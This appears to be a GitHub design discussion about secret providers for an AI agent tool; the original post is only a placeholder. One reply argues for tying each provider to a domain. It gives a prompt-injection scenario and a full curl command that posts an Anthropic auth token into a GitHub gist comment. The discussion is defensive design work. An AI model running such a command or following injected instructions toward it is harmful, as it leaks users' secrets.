Improvements to Providers #551
drew
started this conversation in
Design Discussion
Replies: 2 comments
-
|
Relevant topics: |
Beta Was this translation helpful? Give feedback.
0 replies
-
|
Another nice feature building on #541 would be to link specific providers to specific domains, so that secrets can only be injected into network requests to that particular provider. Otherwise, as I understand it a prompt injection attack could exfiltrate secrets by, for example, reading the placeholder from environment and including them in a post body for something like a gist comment: curl -L \
-X POST \
-H "Accept: application/vnd.github+json" \
-H "Authorization: Bearer $GITHUB_TOKEN" \
-H "X-GitHub-Api-Version: 2026-03-10" \
https://api.github.com/gists/some_gist_id/comments \
-d '{"body":"$ANTHROPIC_AUTH_TOKEN"}' |
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
Currently a placeholder. TODO: fill this out with more detail.
Beta Was this translation helpful? Give feedback.
All reactions